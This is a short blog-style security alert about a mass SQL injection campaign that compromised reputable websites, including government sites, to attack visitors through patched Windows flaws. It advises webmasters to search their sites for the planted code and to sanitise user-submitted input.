Are you safe? A virulent and effective new “virus” is sweeping the Internet that attempts to exploit vulnerabilities on unsuspecting web users visiting legitimate websites. It’s proving effective, since the attack vector is SQL injection on genuine, reputable websites that do not properly enforce good security practices, and so, many users would not reasonably expect to get a problem from such sites. It attempts to exploit 8 known vulnerabilities in Windows software, although these vulnerabilities have now been closed if you have used Windows Update recently. High profile victims include the USA’s Department of Homeland Security and parts of the UK’s Civil Service website. A Google search for the attack code returns over 100,000 results.
Webmasters should check through their website (using an eg ’site:’ search on Google) for the existence of the attack code, which has proven most successful on websites running IIS and MS SQL Server, whilst ensuring that all user-submitted content is properly sanitised to limit the risk of being susceptible to SQL Injection.
More info here.